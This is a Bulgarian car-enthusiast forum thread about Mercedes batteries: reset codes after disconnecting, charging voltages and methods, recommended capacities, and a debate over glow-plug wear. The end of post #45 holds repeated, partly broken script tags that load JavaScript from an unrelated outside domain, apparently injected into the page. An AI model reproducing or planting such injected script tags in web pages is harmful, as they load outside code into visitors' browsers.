Акумулатор?
Started by CyBeR SoUnD, 11 Nov 2007 - 20:28:52
45 replies to this topic
#31
Posted 21 November 2007 - 08:47
Аз имам дизел А170 и от сега се притеснявам ако ми се наложи да сменям или презареждам акумулатора. Понеже чета тук из форумите че евентуално може да повредя компютъра или пък да му се нулират някакви стойности и да иска кодове.
Цитирам на ALEXONE:
"Когато свалите минусовата клема на акумулатора всички елктронни уреди във вашия автомобил ще загубят своите данни (бордови компютър, запаметен код на радиото и т.н.), ето защо тези данни трябва да се въведат след поставянето на акумулатора допълнително. "
Как се въвеждат тези данни допълнително? На сервиз ли трябва да ходи да я закачат за компютър или има и друг начин направо в гаража?
Цитирам на ALEXONE:
"Когато свалите минусовата клема на акумулатора всички елктронни уреди във вашия автомобил ще загубят своите данни (бордови компютър, запаметен код на радиото и т.н.), ето защо тези данни трябва да се въведат след поставянето на акумулатора допълнително. "
Как се въвеждат тези данни допълнително? На сервиз ли трябва да ходи да я закачат за компютър или има и друг начин направо в гаража?
#32
Posted 21 November 2007 - 14:08
Аз имам дизел А170 и от сега се притеснявам ако ми се наложи да сменям или презареждам акумулатора. Понеже чета тук из форумите че евентуално може да повредя компютъра или пък да му се нулират някакви стойности и да иска кодове.
Цитирам на ALEXONE:
"Когато свалите минусовата клема на акумулатора всички елктронни уреди във вашия автомобил ще загубят своите данни (бордови компютър, запаметен код на радиото и т.н.), ето защо тези данни трябва да се въведат след поставянето на акумулатора допълнително. "
Как се въвеждат тези данни допълнително? На сервиз ли трябва да ходи да я закачат за компютър или има и друг начин направо в гаража?
Взимаш си ток с кабели от друга кола закачаш клемите и така не оставяш колата без ток додето го смениш.А ако е само за зареждане няма нужда да се сваля.
#33
Posted 21 November 2007 - 15:54
Е, колега ти ме разби, как си представяш да зареждаш акумилатор без да го свалиш... Мисля че рискуваш да кипне или да стане беля, тогава не е истина каквомазало става с киселината...
Не, според мен едиственото зареждане без да е свален е от алтернатора, иначе за дозарядка - долу и на трансформатора леко с до 10% от ампеража, най-добре с 2-3 колкото часа е нужно - по сметката. При това в началото да се разреди и после зареждане, за да не се налага често...
Не, според мен едиственото зареждане без да е свален е от алтернатора, иначе за дозарядка - долу и на трансформатора леко с до 10% от ампеража, най-добре с 2-3 колкото часа е нужно - по сметката. При това в началото да се разреди и после зареждане, за да не се налага често...
#34
Posted 21 November 2007 - 18:27
W201 с бензинов двигател - 55 А/ч акумулатор, стартерен ток 690-750 АИмам мерцедес 190. Акумулатора е 65 ампера, искам да си купя нов. Кажете ми колко ампера трябва да бъде, някоя хубава марка и ми кажете ако сложа повече ампера има ли някаква опасност от някаква повреда?
W201 с дизелов двигател - 72 А/ч акумулатор, стартерен ток 660-810 А
а колкото до марките въпрос на преценка, аз лично съм за българските но стандартно мерцедес оборудва голяма част от моделите си с Варта
.... Опита е фенер който свети на гърба ни - Конфуций ....
#35
Posted 21 November 2007 - 20:34
Номера е да не надвишиш стойността 13,9-14,1 волта(значи зареждане по метода с постоянно напрежение-пък дръж жиците ако искаш и цял живот на акумолатора)
Когато акумолатора е долу - можеш да го зареждаш по всички други методи(с постоянен ток и по изравнителния метод-който е на-добрия за една батерия и зарежда батерията до 120-130% в дадени случаи)
Мани това което ти казват - 14,5волта
Когато акумолатора е долу - можеш да го зареждаш по всички други методи(с постоянен ток и по изравнителния метод-който е на-добрия за една батерия и зарежда батерията до 120-130% в дадени случаи)
Мани това което ти казват - 14,5волта
Шофьорски стаж ... 28-29г.
За повече контакти - купете си разклонител
#36
Posted 21 November 2007 - 21:08
Късно видях, че питате как влияе по-големият акумулатор, но да отговоря:
Когато се включи подгряване, напрежението на акумулатора пада и свещите са сметнати за него. По-голям акумулатор ще държи по-високо напрежение и от там живота им се скъсява. Някой попита по-бели ли стават. Отговора е, твърдо ДА!
Когато се включи подгряване, напрежението на акумулатора пада и свещите са сметнати за него. По-голям акумулатор ще държи по-високо напрежение и от там живота им се скъсява. Някой попита по-бели ли стават. Отговора е, твърдо ДА!
#37
Posted 21 November 2007 - 21:22
Виж за това не съм се замислялКъсно видях, че питате как влияе по-големият акумулатор, но да отговоря:
Когато се включи подгряване, напрежението на акумулатора пада и свещите са сметнати за него. По-голям акумулатор ще държи по-високо напрежение и от там живота им се скъсява. Някой попита по-бели ли стават. Отговора е, твърдо ДА!
Шофьорски стаж ... 28-29г.
За повече контакти - купете си разклонител
#38
Posted 21 November 2007 - 22:52
Ако щеш и акумулатор от комбайна да сложиш,...напрежението си е постоянно и спада на напрежение в/у подгревателните свещи си остава постоянно!
Закони на физиката!
Капацитета на батерията не влияе негативно в/у консуматорите!
Ровете из избите и вадете мухлясалите учебници!
четете!
Закони на физиката!
Капацитета на батерията не влияе негативно в/у консуматорите!
Ровете из избите и вадете мухлясалите учебници!
четете!
#39
Posted 21 November 2007 - 22:59
Така еАко щеш и акумулатор от комбайна да сложиш,...напрежението си е постоянно и спада на напрежение в/у подгревателните свещи си остава постоянно!
Закони на физиката!
Капацитета на батерията не влияе негативно в/у консуматорите!
Ровете из избите и вадете мухлясалите учебници!
четете!
Капацитета на батерията не би трябва ло да влияе на консуматорите
Просто влияе на продължителността на работата на консуматорите(във време)
Шофьорски стаж ... 28-29г.
За повече контакти - купете си разклонител
#40
Posted 22 November 2007 - 00:00
съгласен съм с LYNX и Vladek по въпроса-карам моя MB 190D с 95 А/ч акумулатор(при фабричен-72 А/ч) и не съм имал проблем
#41
Posted 22 November 2007 - 00:08
къв проблем бе пич,. ..даже требе да си доволен!
На новата C class вече слагаме 110 АН,..вместо 90АН,.....препоръка на производителя!
На новата C class вече слагаме 110 АН,..вместо 90АН,.....препоръка на производителя!
#42
Posted 22 November 2007 - 12:32
Na моя - Ц220 ЦДИ ноември 2001 беше Варта оригиналния, 100 а/ч но имам като опция 673 - "батерия с висок капацитет"
#43
Posted 22 November 2007 - 16:05
Вземи си 65А монбат или искра. Isti ku..ts!
#44
Posted 22 November 2007 - 21:40
Предлагам да направите проверка. Слагате два различни по мощност, греете и мерите напрежението. Колкото по-голям ток може да отдаде един акумулатор, толкова по-малко ще падне напрежението при един и същи товар. Това го знам от старите майстори, които са видяли много изгорели свещи, точно по тази причина. Това, че фирмите предлагат по-мощни акумулатори не значи, че ефекта не се проявява. Сегашните свещи са доста по-добри и издържат на претоварване, а ако не издържат... още по-добре за търговците.
#45
Posted 22 November 2007 - 21:44
Въпросче? - Едно приятелче ми дава 80 А/Ч без парички , свален от 525 тдс и доста читав за през зимата. Дали обаче няма да си прецакам моя който е на 1 год и е в гаранция като стои неизползван до пролетта. Нещо да се разреди примерно и вместо да си го запазя през студовете да го прецакам?
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
1 user(s) are reading this topic
0 members, 1 guests, 0 anonymous users